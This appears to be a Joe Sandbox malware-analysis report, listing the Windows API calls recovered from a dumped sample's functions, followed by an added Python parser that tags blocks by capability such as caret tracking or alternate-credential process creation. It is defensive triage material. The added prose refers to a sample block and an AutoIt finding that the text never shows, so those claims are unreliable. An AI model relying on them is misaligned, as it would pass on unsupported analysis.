                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BD88DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                              • Instruction ID: 68229a53e27b7bf606957fde51e477739ad15f4f812edd1f6b514f7773ec30df
                                              • Opcode Fuzzy Hash: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                              • Instruction Fuzzy Hash: 1031E534604108EFEB249A18DCA5FBCFBE5EB06312F944193F991D63E1EE35D9409752
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00BDAB60
                                              • GetWindowRect.USER32(?,?), ref: 00BDABD6
                                              • PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                              • MessageBeep.USER32(00000000), ref: 00BDAC57
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                              • Instruction ID: 92b4b032e3bafa4b72fd330bccd9e358a208f52caffe11d4d3bbc1a6dd1515d8
                                              • Opcode Fuzzy Hash: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                              • Instruction Fuzzy Hash: BC416E30610119DFDB11DF58D894BA9FBF5FB4A320F1880EAE8159B361E730E941CB92
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B861FB
                                              • __isleadbyte_l.LIBCMT ref: 00B86229
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B86257
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B8628D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                              • Instruction ID: 2f965c09303f10921f210a15c93e872f26a801f390f14849dea16f97f2f2ecd0
                                              • Opcode Fuzzy Hash: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                              • Instruction Fuzzy Hash: 9A31CD30604246AFDF22AF64CC48BBA7BE9FF41310F1540E9E824971A1EB31E950DB90
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00BD4F02
                                                • Part of subcall function 00BB3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BB365B
                                                • Part of subcall function 00BB3641: GetCurrentThreadId.KERNEL32 ref: 00BB3662
                                                • Part of subcall function 00BB3641: AttachThreadInput.USER32(00000000,?,00BB5005), ref: 00BB3669
                                              • GetCaretPos.USER32(?), ref: 00BD4F13
                                              • ClientToScreen.USER32(00000000,?), ref: 00BD4F4E
                                              • GetForegroundWindow.USER32 ref: 00BD4F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                              • Instruction ID: ef64bbb4fdb1a28e3a18758f6777d5c4b9de4b8078e82128a75678d479eb71ed
                                              • Opcode Fuzzy Hash: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                              • Instruction Fuzzy Hash: A4310171D00108AFDB00EFA5C885AEFB7F9EF58300F1044AAE815E7251EB719E058BA0
                                              APIs
                                                • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                                • Part of subcall function 00BA810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                                • Part of subcall function 00BA810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                                • Part of subcall function 00BA810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00BA8141
                                                • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BA86A3
                                              • _memcmp.LIBCMT ref: 00BA86C6
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA86FC
                                              • HeapFree.KERNEL32(00000000), ref: 00BA8703
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 2182266621-0
                                              • Opcode ID: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                              • Instruction ID: c8cac99c2fa3c07f7cfedddd4996b497d776d812b0d5ef0d7f6439acc3feffbd
                                              • Opcode Fuzzy Hash: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                              • Instruction Fuzzy Hash: D8219071E45109EFEB10DFA8CA49BEEB7F8EF45305F158099E455A7240EB30AE09CB90
                                              APIs
                                              • __setmode.LIBCMT ref: 00B709AE
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                              • _fprintf.LIBCMT ref: 00B709E5
                                              • OutputDebugStringW.KERNEL32(?), ref: 00BA5DBB
                                                • Part of subcall function 00B74AAA: _flsall.LIBCMT ref: 00B74AC3
                                              • __setmode.LIBCMT ref: 00B70A1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: daa0cb0f8198a74a5480821b5da4d452e5d06cbefefb993592f8eea8537b2ac3
                                              • Instruction ID: d5466c657344e2b6bcc742b1407544c368ca661b81b24687dd849c669a6f48d5
                                              • Opcode Fuzzy Hash: daa0cb0f8198a74a5480821b5da4d452e5d06cbefefb993592f8eea8537b2ac3
                                              • Instruction Fuzzy Hash: EB113A31908608BFDB04B7B49C86AFE77E8DF42322F2481E6F52957192EF705D4687A1
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC17A3
                                                • Part of subcall function 00BC182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                                • Part of subcall function 00BC182D: InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                              • Instruction ID: fb625cca2fc04c7cb31271128541144cf6e72ff9b7e8103ce747f40803c95701
                                              • Opcode Fuzzy Hash: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                              • Instruction Fuzzy Hash: FD212371208601BFEB128F64CC40FBABBE9FF4A701F10442EFA01A7652DB31D810A7A0
                                              APIs
                                              • GetFileAttributesW.KERNEL32(?,00BDFAC0), ref: 00BB3A64
                                              • GetLastError.KERNEL32 ref: 00BB3A73
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB3A82
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BDFAC0), ref: 00BB3ADF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: 6bcd18dbd0f621efa23a95c0c1d6af14d175efdcbd0ff1e882a6296109f1fe8d
                                              • Instruction ID: b0674166f028431dc7099248bb3d81a7e60a11efe3d5398fd25da0e80cc2ef74
                                              • Opcode Fuzzy Hash: 6bcd18dbd0f621efa23a95c0c1d6af14d175efdcbd0ff1e882a6296109f1fe8d
                                              • Instruction Fuzzy Hash: 9B21D8745082019F8310DF24D8918BEB7E4EF55764F244AAEF4D9C72A1EB71DE09CB42
                                              APIs
                                                • Part of subcall function 00BAF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF0CB
                                                • Part of subcall function 00BAF0BC: lstrcpyW.KERNEL32(00000000,?,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BAF0F1
                                                • Part of subcall function 00BAF0BC: lstrcmpiW.KERNEL32(00000000,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF122
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADCEC
                                              • lstrcpyW.KERNEL32(00000000,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD12
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 4bde18c0d8caad9d8ac8705cd8aae8e7680afd9648cf674a8e294a88895a6e94
                                              • Instruction ID: ee9fdd17f1f90df0d15e94ef4235979443c608137007e54e5d80360c7df0ae29
                                              • Opcode Fuzzy Hash: 4bde18c0d8caad9d8ac8705cd8aae8e7680afd9648cf674a8e294a88895a6e94
                                              • Instruction Fuzzy Hash: C011D03A204306EFCB25AF74C845DBA77E9FF46350B4080BAF856CB2A0EB719941C790
                                              APIs
                                              • _free.LIBCMT ref: 00B85101
                                                • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001), ref: 00B7575F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: 73efa3f737f6e7ac4a0564615d638254f67314280d06ab595802819d8916cab1
                                              • Instruction ID: cad78512df26f50d9c17c8967276d05957e7182fc2c7d309c93c47644335fd87
                                              • Opcode Fuzzy Hash: 73efa3f737f6e7ac4a0564615d638254f67314280d06ab595802819d8916cab1
                                              • Instruction Fuzzy Hash: 9D11E372905A12AECB313F70EC4D76D37D8EB00361B1085AAF919AA260DF31C940D794
                                              APIs
                                              • _memset.LIBCMT ref: 00B544CF
                                                • Part of subcall function 00B5407C: _memset.LIBCMT ref: 00B540FC
                                                • Part of subcall function 00B5407C: _wcscpy.LIBCMT ref: 00B54150
                                                • Part of subcall function 00B5407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00B54524
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B54533
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B8D4B9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                              • Instruction ID: 97f5a9dc25798cc3a40629b7449d7e4da601bf7907d6368109a1aea3dd41290a
                                              • Opcode Fuzzy Hash: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                              • Instruction Fuzzy Hash: 03210770908784AFE7329B249895BE6BBECEF11319F0800DEE69E57291D7746988CB41
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BA85E2
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00BA85E9
                                              • CloseHandle.KERNEL32(00000004), ref: 00BA8603
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BA8632
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 2621361867-0
                                              • Opcode ID: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                              • Instruction ID: 1bfe341ee254715ef8de3e5abc73d6d5afe43301f8d3da12bd57127e74387e6e
                                              • Opcode Fuzzy Hash: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                              • Instruction Fuzzy Hash: 97115C7250520AABDF01CFA8DD49BEEBBE9EF09304F044065FE05A2160DB718D60DB60
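The per-function listings above all share one fixed shape: an `APIs` heading, one bullet per call site giving the API name, the exporting module, the argument list (where recovered) and the `ref:` address, with calls reached through a callee indented under `Part of subcall function`. The Python below, added here as an example and not Joe Sandbox's or the report's own code, parses that shape and tags each block by the Win32 call set it contains. `SAMPLE` is excerpted from three of the blocks above (caret tracking, `CreateProcessWithLogonW`, `gethostbyname`); the `CAPABILITIES` table is the editor's own grouping, not the report's signature logic. One caveat when reading the tags: the report identifies this sample as a compiled AutoIt script, so many of these blocks (tray icon handling, RunAs-style process creation, name resolution) belong to the AutoIt runtime and are present in every AutoIt-compiled executable whether or not the embedded script calls them. A tag therefore says the capability exists in the binary, not that this sample exercised it; the behaviour section of the report is the place to confirm that.

```python
"""Parse the per-function "APIs" blocks of a Joe Sandbox report and tag each
block by the Win32 call set it contains.  Added example, not Joe Sandbox code;
SAMPLE below is excerpted from the report's own listing."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field

# One bullet of an "APIs" listing. Three shapes occur on the page:
#   • OpenProcessToken.ADVAPI32(00000000), ref: 00BA85E9
#   • GetForegroundWindow.USER32 ref: 00BD4F02                     (no argument list)
#   • Part of subcall function 00BB3641: AttachThreadInput.USER32(...), ref: 00BB3669
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w:~]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str            # address of the call site inside the dumped image
    caller: str = ""    # non-empty when listed as "Part of subcall function"


@dataclass
class ApiBlock:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""    # the report's own "API ID" summary line, if present

    def names(self) -> set[str]:
        return {c.name for c in self.calls}


def parse_blocks(text: str) -> list[ApiBlock]:
    """Start a new block at every bare 'APIs' heading; keep call bullets and the API ID line."""
    blocks: list[ApiBlock] = []
    current: ApiBlock | None = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = ApiBlock()
            blocks.append(current)
        elif current is None:
            continue
        elif stripped.startswith("• API ID:"):
            current.api_id = stripped.split(":", 1)[1].strip()
        elif (m := API_LINE.match(line)):
            current.calls.append(
                ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["caller"] or ""))
    return blocks


# Editor's capability table (not the report's signature logic): a block gets a
# tag when every API in the tuple appears in it, subcall lines included.
CAPABILITIES = {
    ("GetForegroundWindow", "GetCaretPos", "AttachThreadInput"): "caret/foreground-window tracking",
    ("OpenProcessToken", "CreateProcessWithLogonW"): "process creation with alternate credentials",
    ("GetTokenInformation", "LookupPrivilegeValueW"): "token integrity/privilege inspection",
    ("gethostbyname", "inet_ntoa"): "hostname resolution",
    ("InternetConnectW", "InternetOpenUrlW"): "WinINet HTTP access",
    ("GetFileAttributesW", "CreateDirectoryW"): "directory creation",
    ("Shell_NotifyIconW", "SetTimer"): "tray icon handling",
}


def tag_block(block: ApiBlock) -> list[str]:
    present = block.names()
    return [tag for apis, tag in CAPABILITIES.items() if set(apis) <= present]


def module_histogram(blocks: list[ApiBlock]) -> Counter:
    """Which DLLs the listed call sites import from: a quick view of where the code reaches."""
    return Counter(c.module for b in blocks for c in b.calls)


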